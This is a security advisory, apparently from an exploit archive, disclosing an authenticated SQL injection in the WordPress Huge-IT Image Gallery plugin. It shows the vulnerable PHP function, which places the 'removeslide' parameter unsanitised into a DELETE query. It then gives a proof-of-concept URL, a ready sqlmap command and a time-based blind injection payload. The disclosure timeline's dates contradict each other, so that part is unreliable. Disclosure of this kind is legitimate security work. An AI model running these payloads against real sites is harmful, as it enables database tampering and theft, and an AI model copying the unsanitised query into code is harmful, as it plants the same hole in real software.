WordPress Huge IT Image Gallery 1.0.0 SQL Injection

2014.09.03
Credit: Claudio Viviani
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://huge-it.com/ # Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs # Date : 2014-08-25 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php ###################### # Vulnerable code : function editgallery($id) { global $wpdb; if(isset($_GET["removeslide"])){ if($_GET["removeslide"] != ''){ $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." "); } } ###################### # PoC Exploit: http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2 # Exploit Code via sqlmap: sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \ -p removeslide --dbms=mysql --level 3 [20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable ... ... ... --- Place: GET Parameter: removeslide Type: AND/OR time-based blind Title: MySQL >= 5.0 time-based blind - Parameter replace Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) --- # PoC Video: https://www.youtube.com/watch?v=gAmb0_o3ZUc ###################### # Vulnerability Disclosure Timeline: 2014-08-25: Discovered vulnerability 2014-08-26: Vendor Notification (Web Customers Service Form) 2014-08-26: No Response/Feedback 2014-08-01: Plugin version 1.0.1 released without fix 2014-08-02: Public Disclosure ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top